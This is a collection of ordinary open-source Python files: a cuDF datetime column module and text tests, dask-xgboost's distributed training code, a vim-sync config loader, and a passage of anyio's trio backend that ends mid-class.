return pa.Array.from_buffers(
type=pa_dtype,
length=len(self),
buffers=[mask, data],
null_count=self.null_count,
)
def default_na_value(self):
"""Returns the default NA value for this column
"""
dkind = self.dtype.kind
if dkind == "M":
return np.datetime64("nat", self.time_unit)
else:
raise TypeError(
"datetime column of {} has no NaN value".format(self.dtype)
)
def binary_operator(self, op, rhs, reflect=False):
lhs, rhs = self, rhs
if op in ("eq", "ne", "lt", "gt", "le", "ge"):
out_dtype = np.bool
else:
raise TypeError(
f"Series of dtype {self.dtype} cannot perform "
f" the operation {op}"
)
return binop(lhs, rhs, op=op, out_dtype=out_dtype)
def fillna(self, fill_value):
if is_scalar(fill_value):
fill_value = np.datetime64(fill_value, self.time_unit)
else:
fill_value = column.as_column(fill_value, nan_as_null=False)
result = libcudf.replace.replace_nulls(self, fill_value)
result = column.build_column(
result.base_data,
result.dtype,
mask=None,
offset=result.offset,
size=result.size,
)
return result
def min(self, dtype=None):
return libcudf.reduce.reduce("min", self, dtype=dtype)
def max(self, dtype=None):
return libcudf.reduce.reduce("max", self, dtype=dtype)
def find_first_value(self, value, closest=False):
"""
Returns offset of first value that matches
"""
value = pd.to_datetime(value)
value = column.as_column(value).as_numerical[0]
return self.as_numerical.find_first_value(value, closest=closest)
def find_last_value(self, value, closest=False):
"""
Returns offset of last value that matches
"""
value = pd.to_datetime(value)
value = column.as_column(value).as_numerical[0]
return self.as_numerical.find_last_value(value, closest=closest)
@property
def is_unique(self):
return self.as_numerical.is_unique
def can_cast_safely(self, to_dtype):
if np.issubdtype(to_dtype, np.datetime64):
to_res, _ = np.datetime_data(to_dtype)
self_res, _ = np.datetime_data(self.dtype)
max_int = np.iinfo(np.dtype("int64")).max
max_dist = self.max().astype(np.timedelta64, copy=False)
min_dist = self.min().astype(np.timedelta64, copy=False)
self_delta_dtype = np.timedelta64(0, self_res).dtype
if max_dist <= np.timedelta64(max_int, to_res).astype(
self_delta_dtype
) and min_dist <= np.timedelta64(max_int, to_res).astype(
self_delta_dtype
):
return True
else:
return False
elif to_dtype == np.dtype("int64") or to_dtype == np.dtype("O"):
# can safely cast to representation, or string
return True
else:
return False
@annotate("BINARY_OP", color="orange", domain="cudf_python")
def binop(lhs, rhs, op, out_dtype):
out = libcudf.binaryop.binaryop(lhs, rhs, op, out_dtype)
return out
def infer_format(element, **kwargs):
"""
    Infers the datetime format from a string; also takes care of `ms` and `ns`.
"""
import re
fmt = pd.core.tools.datetimes._guess_datetime_format(element, **kwargs)
if fmt is not None:
return fmt
element_parts = element.split(".")
if len(element_parts) != 2:
raise ValueError("Unable to infer the timestamp format from the data")
# There is possibility that the element is of following format
# '00:00:03.333333 2016-01-01'
second_part = re.split(r"(\D+)", element_parts[1], maxsplit=1)
subsecond_fmt = ".%" + str(len(second_part[0])) + "f"
first_part = pd.core.tools.datetimes._guess_datetime_format(
element_parts[0], **kwargs
)
# For the case where first_part is '00:00:03'
if first_part is None:
tmp = "1970-01-01 " + element_parts[0]
first_part = pd.core.tools.datetimes._guess_datetime_format(
tmp, **kwargs
).split(" ", 1)[1]
if first_part is None:
raise ValueError("Unable to infer the timestamp format from the data")
if len(second_part) > 1:
second_part = pd.core.tools.datetimes._guess_datetime_format(
"".join(second_part[1:]), **kwargs
)
else:
second_part = ""
try:
fmt = first_part + subsecond_fmt + second_part
except Exception:
raise ValueError("Unable to infer the timestamp format from the data")
return fmt
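# Hedged walk-through of the branch above (exact results depend on the pandas
# version backing _guess_datetime_format): for an element such as
# "11:42:03.001 2016-01-01", the string is split on "." into "11:42:03" and
# "001 2016-01-01"; the three subsecond digits give ".%3f", the time prefix is
# re-guessed with a dummy "1970-01-01 " date to recover "%H:%M:%S", and the
# trailing date text is guessed separately and appended to the format.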
```
#### File: cudf/tests/test_text.py
```python
import pytest
from pandas.util.testing import assert_series_equal
import cudf
def test_tokenize():
strings = cudf.Series(
[
"the quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat jumped under the sofa",
None,
"",
]
)
expected = cudf.Series(
[
"the",
"quick",
"fox",
"jumped",
"over",
"the",
"lazy",
"dog",
"the",
"siamรฉsรฉ",
"cat",
"jumped",
"under",
"the",
"sofa",
]
)
actual = strings.str.tokenize()
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"delimiter, expected_token_counts",
[
("", [10, 9, 0, 0, 5]),
("o", [6, 3, 0, 0, 1]),
(["a", "e", "i", "o", "u"], [13, 13, 0, 0, 6]),
(["a", "e", "i", "o"], [12, 11, 0, 0, 6]),
],
)
def test_token_count(delimiter, expected_token_counts):
strings = cudf.Series(
[
"the quick brown fox jumped over the lazy brown dog",
"the sable siamรฉsรฉ cat jumped under the brown sofa",
None,
"",
"test_str\x01test_str\x02test_str\x03test_str\x04test_str\x05",
]
)
expected = cudf.Series(expected_token_counts)
actual = strings.str.token_count(delimiter)
assert type(expected) == type(actual)
assert_series_equal(
expected.to_pandas(), actual.to_pandas(), check_dtype=False
)
def test_normalize_spaces():
strings = cudf.Series(
[
" the\t quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat\f jumped\t\tunder the sofa ",
None,
"",
]
)
expected = cudf.Series(
[
"the quick fox jumped over the lazy dog",
"the siamรฉsรฉ cat jumped under the sofa",
None,
"",
]
)
actual = strings.str.normalize_spaces()
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"n, separator, expected_values",
[
(
2,
"_",
[
"this_is",
"is_my",
"my_favorite",
"favorite_book",
"book_on",
"on_my",
"my_bookshelf",
],
),
(
3,
"-",
[
"this-is-my",
"is-my-favorite",
"my-favorite-book",
"favorite-book-on",
"book-on-my",
"on-my-bookshelf",
],
),
],
)
def test_ngrams(n, separator, expected_values):
strings = cudf.Series(
["this", "is", "my", "favorite", "book", "on", "my", "bookshelf"]
)
expected = cudf.Series(expected_values)
actual = strings.str.ngrams(n=n, separator=separator)
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
@pytest.mark.parametrize(
"n, separator, expected_values",
[
(
2,
"_",
[
"this_is",
"is_my",
"my_favorite",
"book_on",
"on_my",
"my_bookshelf",
],
),
(
3,
"-",
["this-is-my", "is-my-favorite", "book-on-my", "on-my-bookshelf"],
),
],
)
def test_ngrams_tokenize(n, separator, expected_values):
strings = cudf.Series(["this is my favorite", "book on my bookshelf"])
expected = cudf.Series(expected_values)
actual = strings.str.ngrams_tokenize(n=n, separator=separator)
assert type(expected) == type(actual)
assert_series_equal(expected.to_pandas(), actual.to_pandas())
``` |
{
"source": "JohnZed/dask-xgboost",
"score": 2
} |
#### File: dask-xgboost/dask_xgboost/core.py
```python
from collections import defaultdict
import logging
from threading import Thread
import time
import numpy as np
import pandas as pd
import cudf as gd
from toolz import first, assoc
from tornado import gen
try:
import sparse
import scipy.sparse as ss
except ImportError:
sparse = False
ss = False
from dask import delayed
from dask.delayed import Delayed, delayed
from dask.base import tokenize, normalize_token, DaskMethodsMixin
from dask.utils import funcname, M, OperatorMethodMixin
from dask.context import _globals
from dask.core import flatten
from dask.threaded import get as threaded_get
from dask.optimization import cull, fuse
from toolz import merge, partition_all
from dask.distributed import wait, default_client
import dask.dataframe as dd
import dask.array as da
import dask_cudf as dgd
import xgboost as xgb
from .tracker import RabitTracker
logger = logging.getLogger(__name__)
def parse_host_port(address):
if '://' in address:
address = address.rsplit('://', 1)[1]
host, port = address.split(':')
port = int(port)
return host, port
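# Minimal sketch of the expected behaviour (illustrative addresses only):
# parse_host_port('tcp://192.168.1.10:8786') -> ('192.168.1.10', 8786)
# parse_host_port('192.168.1.10:8786')       -> ('192.168.1.10', 8786)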
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
elif isinstance(L[0], (gd.DataFrame, gd.Series)):
return gd.concat(L)
elif isinstance(L[0], xgb.DMatrix):
return
elif ss and isinstance(L[0], ss.spmatrix):
return ss.vstack(L, format='csr')
elif sparse and isinstance(L[0], sparse.SparseArray):
return sparse.concatenate(L, axis=0)
else:
raise TypeError("Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0]))
def train_part(env, param, list_of_parts, dmatrix_kwargs=None, **kwargs):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
models found by each worker
"""
data, labels = zip(*list_of_parts) # Prepare data
if labels[0] is not None:
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dtrain = xgb.DMatrix(data, labels, **dmatrix_kwargs)
elif labels[0] is None and isinstance(data[0], xgb.DMatrix):
dtrain = data[0]
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
elif labels[0] is None and isinstance(data[0], gd.DataFrame):
data = concat(data)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dtrain = xgb.DMatrix(data, **dmatrix_kwargs)
args = [('%s=%s' % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, **kwargs)
result = bst
if xgb.rabit.get_rank() > 0 and not param.get('dask_all_models', False):
result = None
finally:
xgb.rabit.finalize()
return result
@gen.coroutine
def _train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = None
label_parts = None
if isinstance(data, (list, tuple)):
if isinstance(data[0], Delayed):
for data_part in data:
if not isinstance(data_part, Delayed):
raise AssertionError("not all data is delayed")
data_parts = data
else:
data_parts = data.to_delayed()
if labels is not None:
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
if labels is not None:
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield wait(parts)
else:
parts = list(map(delayed, zip(data_parts, [None]*len(data_parts))))
parts = client.compute(parts)
yield wait(parts)
for part in parts:
if part.status == 'error':
yield part # trigger error locally
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(start_tracker,
host.strip('/:'),
len(worker_map))
# Tell each worker to train on the chunks/parts that it has locally
futures = [client.submit(train_part, env,
assoc(params, 'nthread', ncores[worker]),
list_of_parts, workers=worker,
dmatrix_kwargs=dmatrix_kwargs, **kwargs)
for worker, list_of_parts in worker_map.items()]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v]
if not params.get('dask_all_models', False):
result = result[0]
num_class = params.get('num_class')
if num_class:
result.set_attr(num_class=str(num_class))
raise gen.Return(result)
def train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
dmatrix_kwargs: Keywords to give to Xgboost DMatrix
**kwargs: Keywords to give to XGBoost train
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return client.sync(_train, client, params, data,
labels, dmatrix_kwargs, **kwargs)
def _predict_part(part, model=None):
xgb.rabit.init()
try:
dm = xgb.DMatrix(part)
result = model.predict(dm)
finally:
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
if model.attr("num_class"):
result = pd.DataFrame(result, index=part.index)
else:
result = pd.Series(result, index=part.index, name='predictions')
if isinstance(part, gd.DataFrame):
if model.attr("num_class"):
result = gd.DataFrame(result, index=part.index)
else:
result = gd.Series(result, index=part.index)
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
    >>> model  # doctest: +SKIP
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
if isinstance(data, dgd.core._Frame):
result = data.map_partitions(_predict_part, model=model)
elif isinstance(data, dd._Frame):
result = data.map_partitions(_predict_part, model=model)
result = result.values
elif isinstance(data, da.Array):
num_class = model.attr("num_class") or 2
num_class = int(num_class)
if num_class > 2:
kwargs = dict(
drop_axis=None,
chunks=(data.chunks[0], (num_class,)),
)
else:
kwargs = dict(
drop_axis=1,
)
result = data.map_blocks(_predict_part, model=model,
dtype=np.float32,
**kwargs)
return result
class DaskRegressionMixin:
def fit(self, X, y=None):
"""Fit the gradient boosting model
Parameters
----------
X : array-like [n_samples, n_features]
y : array-like
Returns
-------
self : the fitted Regressor
Notes
-----
        This differs from the XGBoost version in not supporting the ``eval_set``,
``eval_metric``, ``early_stopping_rounds`` and ``verbose`` fit
kwargs.
"""
client = default_client()
xgb_options = self.get_xgb_params()
self._Booster = train(client, xgb_options, X, y,
num_boost_round=self.get_num_boosting_rounds())
return self
def predict(self, X):
client = default_client()
return predict(client, self._Booster, X)
class DaskClassificationMixin:
def fit(self, X, y=None, classes=None):
"""Fit a gradient boosting classifier
Parameters
----------
X : array-like [n_samples, n_features]
Feature Matrix. May be a dask.array or dask.dataframe
y : array-like
Labels
classes : sequence, optional
            The unique values in `y`. If not specified, this will be
eagerly computed from `y` before training.
Returns
-------
self : XGBClassifier
Notes
-----
This differs from the XGBoost version in three ways
1. The ``sample_weight``, ``eval_set``, ``eval_metric``,
``early_stopping_rounds`` and ``verbose`` fit kwargs are not
supported.
2. The labels are not automatically label-encoded
3. The ``classes_`` and ``n_classes_`` attributes are not learned
"""
client = default_client()
if classes is None:
if isinstance(y, da.Array):
classes = da.unique(y)
else:
classes = y.unique()
classes = classes.compute()
else:
classes = np.asarray(classes)
self.classes_ = classes
self.n_classes_ = len(self.classes_)
xgb_options = self.get_xgb_params()
if self.n_classes_ > 2:
# xgboost just ignores the user-provided objective
# We only overwrite if it's the default...
if xgb_options['objective'] == "binary:logistic":
xgb_options["objective"] = "multi:softprob"
xgb_options.setdefault('num_class', self.n_classes_)
# xgboost sets this to self.objective, which I think is wrong
# hyper-parameters should not be updated during fit.
self.objective = xgb_options['objective']
# TODO: auto label-encode y
# that will require a dependency on dask-ml
# TODO: sample weight
self._Booster = train(client, xgb_options, X, y,
num_boost_round=self.get_num_boosting_rounds())
return self
def predict(self, X):
client = default_client()
class_probs = predict(client, self._Booster, X)
if class_probs.ndim > 1:
cidx = da.argmax(class_probs, axis=1)
else:
cidx = (class_probs > 0).astype(np.int64)
return cidx
def predict_proba(self, data, ntree_limit=None):
client = default_client()
if ntree_limit is not None:
raise NotImplementedError("'ntree_limit' is not currently "
"supported.")
class_probs = predict(client, self._Booster, data)
return class_probs
class XGBRegressor(DaskRegressionMixin, xgb.XGBRegressor):
pass
class XGBRFRegressor(DaskRegressionMixin, xgb.XGBRFRegressor):
pass
class XGBClassifier(DaskClassificationMixin, xgb.XGBClassifier):
pass
class XGBRFClassifier(DaskClassificationMixin, xgb.XGBRFClassifier):
pass
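# Hedged usage sketch (object names below are illustrative, not from this file;
# fit/predict rely on dask.distributed.default_client(), so a Client must exist):
#
#     from dask.distributed import Client
#     client = Client('scheduler-address:8786')
#     clf = XGBClassifier(max_depth=4, n_estimators=50)
#     clf.fit(X_dask, y_dask)      # dask arrays or dataframes
#     preds = clf.predict(X_dask)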
``` |
{
"source": "johnzeng/vim-sync",
"score": 2
} |
#### File: vim-sync/pythonx/config_loader.py
```python
import vim
import json
class config_manager:
def __init__(self, root_path):
try:
self.root_path = root_path
self.marked = []
self.load_array = None
self.err = None
with open(root_path + '/.vim-sync', 'r') as f:
self.load_array = json.load(f)
for element in self.load_array:
if element['dest'][-1] != '/':
element['dest'] = element['dest'] + '/'
if 'sync_frequence' not in element:
element['sync_frequence'] = 1
if 'command' not in element:
element['command'] = 'cp'
if 'marked' in element and element['marked'] == 1:
self.marked.append(element)
self.is_load = True
except Exception as err :
self.err = err
self.is_load = False
self.load_array = []
def reload(self):
self.__init__(self.root_path)
if self.err is not None:
print(str(self.err))
def is_loaded(self):
return self.is_load
def get_marked(self):
return self.marked
def get_all_files(self):
return self.load_array
def get_all_file_names(self):
vim.command('let g:all_vim_sync_dest=[]')
for element in self.load_array:
vim.command('call add(g:all_vim_sync_dest, "%s")' % element["dest"])
cfg_mgr_singlen = None
def get_config_manager(root_path):
global cfg_mgr_singlen
if cfg_mgr_singlen is None:
cfg_mgr_singlen = config_manager(root_path)
return cfg_mgr_singlen
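# Hedged sketch of the expected .vim-sync file (field names inferred from the
# parsing above; the values are illustrative, and 'command' defaults to 'cp'):
#
#     [
#         {"dest": "user@host:/srv/app/", "command": "scp",
#          "sync_frequence": 1, "marked": 1}
#     ]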
``` |
{
"source": "johnzeringue/anyio",
"score": 2
} |
#### File: anyio/_backends/_trio.py
```python
import array
import math
import socket
from concurrent.futures import Future
from dataclasses import dataclass
from functools import partial
from io import IOBase
from os import PathLike
from types import TracebackType
from typing import (
Any, Awaitable, Callable, Collection, Coroutine, Dict, Generic, List, Mapping, NoReturn,
Optional, Set, Tuple, Type, TypeVar, Union)
import trio.from_thread
from outcome import Error, Value
from trio.to_thread import run_sync
from .. import CapacityLimiterStatistics, EventStatistics, TaskInfo, abc
from .._core._compat import DeprecatedAsyncContextManager, DeprecatedAwaitable, T
from .._core._eventloop import claim_worker_thread
from .._core._exceptions import (
BrokenResourceError, BusyResourceError, ClosedResourceError, EndOfStream)
from .._core._exceptions import ExceptionGroup as BaseExceptionGroup
from .._core._sockets import convert_ipv6_sockaddr
from .._core._synchronization import CapacityLimiter as BaseCapacityLimiter
from .._core._synchronization import Event as BaseEvent
from .._core._synchronization import ResourceGuard
from .._core._tasks import CancelScope as BaseCancelScope
from ..abc import IPSockAddrType, UDPPacketType
try:
from trio import lowlevel as trio_lowlevel
except ImportError:
from trio import hazmat as trio_lowlevel
from trio.hazmat import wait_readable, wait_writable
else:
from trio.lowlevel import wait_readable, wait_writable
T_Retval = TypeVar('T_Retval')
T_SockAddr = TypeVar('T_SockAddr', str, IPSockAddrType)
#
# Event loop
#
run = trio.run
current_token = trio.lowlevel.current_trio_token
RunVar = trio.lowlevel.RunVar
#
# Miscellaneous
#
sleep = trio.sleep
#
# Timeouts and cancellation
#
class CancelScope(BaseCancelScope):
def __new__(cls, original: Optional[trio.CancelScope] = None, **kwargs):
return object.__new__(cls)
def __init__(self, original: Optional[trio.CancelScope] = None, **kwargs):
self.__original = original or trio.CancelScope(**kwargs)
def __enter__(self):
self.__original.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return self.__original.__exit__(exc_type, exc_val, exc_tb)
def cancel(self) -> DeprecatedAwaitable:
self.__original.cancel()
return DeprecatedAwaitable(self.cancel)
@property
def deadline(self) -> float:
return self.__original.deadline
@deadline.setter
def deadline(self, value: float) -> None:
self.__original.deadline = value
@property
def cancel_called(self) -> bool:
return self.__original.cancel_called
@property
def shield(self) -> bool:
return self.__original.shield
@shield.setter
def shield(self, value: bool) -> None:
self.__original.shield = value
CancelledError = trio.Cancelled
checkpoint = trio.lowlevel.checkpoint
checkpoint_if_cancelled = trio.lowlevel.checkpoint_if_cancelled
cancel_shielded_checkpoint = trio.lowlevel.cancel_shielded_checkpoint
current_effective_deadline = trio.current_effective_deadline
current_time = trio.current_time
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup, trio.MultiError):
pass
class TaskGroup(abc.TaskGroup):
def __init__(self):
self._active = False
self._nursery_manager = trio.open_nursery()
self.cancel_scope = None
async def __aenter__(self):
self._active = True
self._nursery = await self._nursery_manager.__aenter__()
self.cancel_scope = CancelScope(self._nursery.cancel_scope)
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
try:
return await self._nursery_manager.__aexit__(exc_type, exc_val, exc_tb)
except trio.MultiError as exc:
raise ExceptionGroup(exc.exceptions) from None
finally:
self._active = False
def start_soon(self, func: Callable, *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be started.')
self._nursery.start_soon(func, *args, name=name)
async def start(self, func: Callable[..., Coroutine], *args, name=None):
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be started.')
return await self._nursery.start(func, *args, name=name)
#
# Threads
#
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional[trio.CapacityLimiter] = None) -> T_Retval:
def wrapper():
with claim_worker_thread('trio'):
return func(*args)
return await run_sync(wrapper, cancellable=cancellable, limiter=limiter)
run_async_from_thread = trio.from_thread.run
run_sync_from_thread = trio.from_thread.run_sync
class BlockingPortal(abc.BlockingPortal):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
super().__init__()
self._token = trio.lowlevel.current_trio_token()
def _spawn_task_from_thread(self, func: Callable, args: tuple, kwargs: Dict[str, Any],
name, future: Future) -> None:
return trio.from_thread.run_sync(
partial(self._task_group.start_soon, name=name), self._call_func, func, args, kwargs,
future, trio_token=self._token)
#
# Subprocesses
#
@dataclass(eq=False)
class ReceiveStreamWrapper(abc.ByteReceiveStream):
_stream: trio.abc.ReceiveStream
async def receive(self, max_bytes: Optional[int] = None) -> bytes:
try:
data = await self._stream.receive_some(max_bytes)
except trio.ClosedResourceError as exc:
raise ClosedResourceError from exc.__cause__
except trio.BrokenResourceError as exc:
raise BrokenResourceError from exc.__cause__
if data:
return data
else:
raise EndOfStream
async def aclose(self) -> None:
await self._stream.aclose()
@dataclass(eq=False)
class SendStreamWrapper(abc.ByteSendStream):
_stream: trio.abc.SendStream
async def send(self, item: bytes) -> None:
try:
await self._stream.send_all(item)
except trio.ClosedResourceError as exc:
raise ClosedResourceError from exc.__cause__
except trio.BrokenResourceError as exc:
raise BrokenResourceError from exc.__cause__
async def aclose(self) -> None:
await self._stream.aclose()
@dataclass(eq=False)
class Process(abc.Process):
_process: trio.Process
_stdin: Optional[abc.ByteSendStream]
_stdout: Optional[abc.ByteReceiveStream]
_stderr: Optional[abc.ByteReceiveStream]
async def aclose(self) -> None:
if self._stdin:
await self._stdin.aclose()
if self._stdout:
await self._stdout.aclose()
if self._stderr:
await self._stderr.aclose()
await self.wait()
async def wait(self) -> int:
return await self._process.wait()
def terminate(self) -> None:
self._process.terminate()
def kill(self) -> None:
self._process.kill()
def send_signal(self, signal: int) -> None:
self._process.send_signal(signal)
@property
def pid(self) -> int:
return self._process.pid
@property
def returncode(self) -> Optional[int]:
return self._process.returncode
@property
def stdin(self) -> Optional[abc.ByteSendStream]:
return self._stdin
@property
def stdout(self) -> Optional[abc.ByteReceiveStream]:
return self._stdout
@property
def stderr(self) -> Optional[abc.ByteReceiveStream]:
return self._stderr
async def open_process(command, *, shell: bool, stdin: int, stdout: int, stderr: int,
cwd: Union[str, bytes, PathLike, None] = None,
env: Optional[Mapping[str, str]] = None) -> Process:
process = await trio.open_process(command, stdin=stdin, stdout=stdout, stderr=stderr,
shell=shell, cwd=cwd, env=env)
stdin_stream = SendStreamWrapper(process.stdin) if process.stdin else None
stdout_stream = ReceiveStreamWrapper(process.stdout) if process.stdout else None
stderr_stream = ReceiveStreamWrapper(process.stderr) if process.stderr else None
return Process(process, stdin_stream, stdout_stream, stderr_stream)
class _ProcessPoolShutdownInstrument(trio.abc.Instrument):
def after_run(self):
super().after_run()
current_default_worker_process_limiter = trio.lowlevel.RunVar(
'current_default_worker_process_limiter')
async def _shutdown_process_pool(workers: Set[Process]) -> None:
process: Process
try:
await sleep(math.inf)
except trio.Cancelled:
for process in workers:
if process.returncode is None:
process.kill()
with CancelScope(shield=True):
for process in workers:
await process.aclose()
def setup_process_pool_exit_at_shutdown(workers: Set[Process]) -> None:
trio.lowlevel.spawn_system_task(_shutdown_process_pool, workers)
#
# Sockets and networking
#
class _TrioSocketMixin(Generic[T_SockAddr]):
def __init__(self, trio_socket):
self._trio_socket = trio_socket
self._closed = False
def _check_closed(self) -> None:
if self._closed:
raise ClosedResourceError
if self._trio_socket.fileno() < 0:
raise BrokenResourceError
@property
def _raw_socket(self) -> socket.socket:
return self._trio_socket._sock
async def aclose(self) -> None:
if self._trio_socket.fileno() >= 0:
self._closed = True
self._trio_socket.close()
def _convert_socket_error(self, exc: BaseException) -> 'NoReturn':
if isinstance(exc, trio.ClosedResourceError):
raise ClosedResourceError from exc
elif self._trio_socket.fileno() < 0 and self._closed:
raise ClosedResourceError from None
elif isinstance(exc, OSError):
raise BrokenResourceError from exc
else:
raise exc
class SocketStream(_TrioSocketMixin, abc.SocketStream):
def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
try:
data = await self._trio_socket.recv(max_bytes)
except BaseException as exc:
self._convert_socket_error(exc)
if data:
return data
else:
raise EndOfStream
async def send(self, item: bytes) -> None:
with self._send_guard:
view = memoryview(item)
while view:
try:
bytes_sent = await self._trio_socket.send(view)
except BaseException as exc:
self._convert_socket_error(exc)
view = view[bytes_sent:]
async def send_eof(self) -> None:
self._trio_socket.shutdown(socket.SHUT_WR)
class UNIXSocketStream(SocketStream, abc.UNIXSocketStream):
async def receive_fds(self, msglen: int, maxfds: int) -> Tuple[bytes, List[int]]:
if not isinstance(msglen, int) or msglen < 0:
raise ValueError('msglen must be a non-negative integer')
if not isinstance(maxfds, int) or maxfds < 1:
raise ValueError('maxfds must be a positive integer')
fds = array.array("i")
await checkpoint()
with self._receive_guard:
while True:
try:
message, ancdata, flags, addr = await self._trio_socket.recvmsg(
msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
except BaseException as exc:
self._convert_socket_error(exc)
else:
if not message and not ancdata:
raise EndOfStream
break
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level != socket.SOL_SOCKET or cmsg_type != socket.SCM_RIGHTS:
raise RuntimeError(f'Received unexpected ancillary data; message = {message}, '
f'cmsg_level = {cmsg_level}, cmsg_type = {cmsg_type}')
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return message, list(fds)
async def send_fds(self, message: bytes, fds: Collection[Union[int, IOBase]]) -> None:
if not message:
raise ValueError('message must not be empty')
if not fds:
raise ValueError('fds must not be empty')
filenos: List[int] = []
for fd in fds:
if isinstance(fd, int):
filenos.append(fd)
elif isinstance(fd, IOBase):
filenos.append(fd.fileno())
fdarray = array.array("i", filenos)
await checkpoint()
with self._send_guard:
while True:
try:
await self._trio_socket.sendmsg(
[message], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fdarray)])
break
except BaseException as exc:
self._convert_socket_error(exc)
class TCPSocketListener(_TrioSocketMixin, abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
super().__init__(trio.socket.from_stdlib_socket(raw_socket))
self._accept_guard = ResourceGuard('accepting connections from')
async def accept(self) -> SocketStream:
with self._accept_guard:
try:
trio_socket, _addr = await self._trio_socket.accept()
except BaseException as exc:
self._convert_socket_error(exc)
trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
return SocketStream(trio_socket)
class UNIXSocketListener(_TrioSocketMixin, abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
super().__init__(trio.socket.from_stdlib_socket(raw_socket))
self._accept_guard = ResourceGuard('accepting connections from')
async def accept(self) -> UNIXSocketStream:
with self._accept_guard:
try:
trio_socket, _addr = await self._trio_socket.accept()
except BaseException as exc:
self._convert_socket_error(exc)
return UNIXSocketStream(trio_socket)
class UDPSocket(_TrioSocketMixin[IPSockAddrType], abc.UDPSocket):
def __init__(self, trio_socket):
super().__init__(trio_socket)
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
try:
data, addr = await self._trio_socket.recvfrom(65536)
return data, convert_ipv6_sockaddr(addr)
except BaseException as exc:
self._convert_socket_error(exc)
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
try:
await self._trio_socket.sendto(*item)
except BaseException as exc:
self._convert_socket_error(exc)
class ConnectedUDPSocket(_TrioSocketMixin[IPSockAddrType], abc.ConnectedUDPSocket):
